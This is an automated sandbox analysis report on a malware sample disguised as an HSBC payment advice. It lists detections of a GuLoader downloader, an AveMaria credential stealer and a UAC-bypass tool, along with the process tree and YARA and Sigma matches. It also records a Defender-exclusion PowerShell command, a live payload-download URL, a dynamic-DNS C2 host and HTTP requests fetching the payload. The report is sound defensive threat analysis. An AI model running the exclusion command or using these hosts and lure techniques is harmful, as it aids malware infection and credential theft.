Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report HSBC Payment Advice.exe

Overview

General Information

Sample Name:HSBC Payment Advice.exe
Analysis ID:528768
MD5:a069e61b357f625a7b3595150412c42d
SHA1:5fa560d04b13db7e0216bda2ca5f1c3b94a8912e
SHA256:0fb47a47bc025991b3ed8895aa84030def6e5cc538a9cec279a73f4528d549c6
Tags:exeHSBCsigned
Infos:

Most interesting Screenshot:

Detection

GuLoader AveMaria UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Increases the number of concurrent connection per server for Internet Explorer
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • HSBC Payment Advice.exe (PID: 6196 cmdline: "C:\Users\user\Desktop\HSBC Payment Advice.exe" MD5: A069E61B357F625A7B3595150412C42D)
    • HSBC Payment Advice.exe (PID: 5816 cmdline: "C:\Users\user\Desktop\HSBC Payment Advice.exe" MD5: A069E61B357F625A7B3595150412C42D)
      • powershell.exe (PID: 7140 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • images.exe (PID: 6136 cmdline: C:\ProgramData\images.exe MD5: A069E61B357F625A7B3595150412C42D)
        • images.exe (PID: 5216 cmdline: C:\ProgramData\images.exe MD5: A069E61B357F625A7B3595150412C42D)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://spuredge.com/warzone_JBBOxCEy72.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0x1cc30:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0x1cc30:$c1: Elevation:Administrator!new:
    0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
      0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
          Click to see the 18 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          • 0xd80:$c1: Elevation:Administrator!new:
          12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
            12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
              12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
              • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
              Click to see the 11 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Powershell Defender ExclusionShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC Payment Advice.exe" , ParentImage: C:\Users\user\Desktop\HSBC Payment Advice.exe, ParentProcessId: 5816, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7140
              Sigma detected: Non Interactive PowerShellShow sources
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC Payment Advice.exe" , ParentImage: C:\Users\user\Desktop\HSBC Payment Advice.exe, ParentProcessId: 5816, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7140
              Sigma detected: T1086 PowerShell ExecutionShow sources
              Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132823686502527122.7140.DefaultAppDomain.powershell

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://spuredge.com/warzone_JBBOxCEy72.bin"}
              Multi AV Scanner detection for submitted fileShow sources
              Source: HSBC Payment Advice.exeVirustotal: Detection: 56%Perma Link
              Source: HSBC Payment Advice.exeMetadefender: Detection: 20%Perma Link
              Source: HSBC Payment Advice.exeReversingLabs: Detection: 48%
              Yara detected AveMaria stealerShow sources
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Multi AV Scanner detection for domain / URLShow sources
              Source: spuredge.comVirustotal: Detection: 11%Perma Link
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\ProgramData\images.exeVirustotal: Detection: 56%Perma Link
              Source: C:\ProgramData\images.exeMetadefender: Detection: 20%Perma Link
              Source: C:\ProgramData\images.exeReversingLabs: Detection: 48%
              Machine Learning detection for sampleShow sources
              Source: HSBC Payment Advice.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped fileShow sources
              Source: C:\ProgramData\images.exeJoe Sandbox ML: detected
              Source: 12.0.HSBC Payment Advice.exe.400000.1.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 12.0.HSBC Payment Advice.exe.400000.3.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 28.0.images.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 12.0.HSBC Payment Advice.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 28.0.images.exe.400000.1.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 0.0.HSBC Payment Advice.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 21.2.images.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 21.0.images.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 0.2.HSBC Payment Advice.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 12.0.HSBC Payment Advice.exe.400000.2.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 28.0.images.exe.400000.2.unpackAvira: Label: TR/Dropper.VB.Gen
              Source: 28.0.images.exe.400000.3.unpackAvira: Label: TR/Dropper.VB.Gen

              Exploits:

              barindex
              Yara detected UACMe UAC Bypass toolShow sources
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
              Source: HSBC Payment Advice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49823 version: TLS 1.2
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: https://spuredge.com/warzone_JBBOxCEy72.bin
              Uses dynamic DNS servicesShow sources
              Source: unknownDNS query: name: barr2.ddns.net
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: spuredge.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: spuredge.comCache-Control: no-cache
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: HSBC Payment Advice.exe, 0000000C.00000003.502726009.0000000001B35000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501873155.0000000001B34000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.498183760.0000000001B36000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.509729103.0000000001B35000.00000004.00000020.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.498385567.0000000001B36000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://ocsp.digicert.com0O
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
              Source: HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmpString found in binary or memory: https://spuredge.com/warzone_JBBOxCEy72.bin
              Source: HSBC Payment Advice.exe, images.exe.12.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownDNS traffic detected: queries for: spuredge.com
              Source: global trafficHTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: spuredge.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: spuredge.comCache-Control: no-cache
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49823 version: TLS 1.2
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpBinary or memory string: GetRawInputData

              E-Banking Fraud:

              barindex
              Yara detected AveMaria stealerShow sources
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY

              System Summary:

              barindex
              Potential malicious icon foundShow sources
              Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
              Malicious sample detected (through community Yara rule)Show sources
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: HSBC Payment Advice.exe
              Executable has a suspicious name (potential lure to open the executable)Show sources
              Source: HSBC Payment Advice.exeStatic file information: Suspicious name
              Source: HSBC Payment Advice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004011A80_2_004011A8
              Source: C:\ProgramData\images.exeCode function: 28_2_017A95F928_2_017A95F9
              Source: C:\ProgramData\images.exeCode function: 28_2_017A922A28_2_017A922A
              Source: C:\ProgramData\images.exeCode function: 28_2_017A181928_2_017A1819
              Source: C:\ProgramData\images.exeCode function: 28_2_017AF0C828_2_017AF0C8
              Source: C:\ProgramData\images.exeCode function: 28_2_017A037F28_2_017A037F
              Source: C:\ProgramData\images.exeCode function: 28_2_017A575828_2_017A5758
              Source: C:\ProgramData\images.exeCode function: 28_2_017AC71328_2_017AC713
              Source: C:\ProgramData\images.exeCode function: 28_2_017A441528_2_017A4415
              Source: C:\ProgramData\images.exeCode function: 28_2_017A9AD428_2_017A9AD4
              Source: C:\ProgramData\images.exeCode function: 28_2_017A76CA28_2_017A76CA
              Source: C:\ProgramData\images.exeCode function: 28_2_017ADCC328_2_017ADCC3
              Source: C:\ProgramData\images.exeCode function: 28_2_017A948328_2_017A9483
              Source: C:\ProgramData\images.exeCode function: 28_2_017A95F9 NtAllocateVirtualMemory,28_2_017A95F9
              Source: C:\ProgramData\images.exeCode function: 28_2_017AEB88 NtProtectVirtualMemory,28_2_017AEB88
              Source: C:\ProgramData\images.exeProcess Stats: CPU usage > 98%
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess Stats: CPU usage > 98%
              Source: HSBC Payment Advice.exe, 00000000.00000000.245504475.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000000.376134620.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000002.517452791.000000001F0E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exeBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
              Source: HSBC Payment Advice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: images.exe.12.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: HSBC Payment Advice.exeStatic PE information: invalid certificate
              Source: HSBC Payment Advice.exeVirustotal: Detection: 56%
              Source: HSBC Payment Advice.exeMetadefender: Detection: 20%
              Source: HSBC Payment Advice.exeReversingLabs: Detection: 48%
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile read: C:\Users\user\Desktop\HSBC Payment Advice.exeJump to behavior
